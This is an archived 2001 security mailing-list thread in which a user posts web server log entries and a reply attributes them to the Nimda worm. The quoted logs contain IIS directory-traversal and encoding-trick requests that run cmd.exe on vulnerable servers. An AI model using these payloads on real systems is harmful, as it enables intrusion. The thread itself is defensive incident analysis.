Re: code red request, but cant be resolved?

From: Mike Shaw (mshawat_private)
Date: Thu Oct 25 2001 - 14:26:40 PDT

  • Next message: Sam Brothers: "TCP FIN Increase"

    It has a reverse lookup (64.148.216.72) but no forward lookup.  That IP 
    block is indeed owned by Internetconnect.
    
    Looks like simple Nimdaness to me.
    
    -Mike
    
    At 04:08 PM 10/25/2001 -0500, Emre Yildirim wrote:
    >Hi,
    >
    >I just got this.  Is it just me, or is this address spoofed?
    >Can anyone resolve dsl-6414821672.internetconnect.net?
    >
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:47 -0500] "GET 
    >/scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET 
    >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
    >HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET 
    >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
    >HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET 
    >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
    >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET 
    >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
    >
    >
    >
    >--
    >Emre Yildirim <emreat_private>
    >GPG KeyID 0xF9E4A1D1 (keyserver.pgp.com)
    >
    >
    >----------------------------------------------------------------------------
    >This list is provided by the SecurityFocus ARIS analyzer service.
    >For more information on this free incident handling, management and 
    >tracking system please see: http://aris.securityfocus.com
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 14:31:24 PDT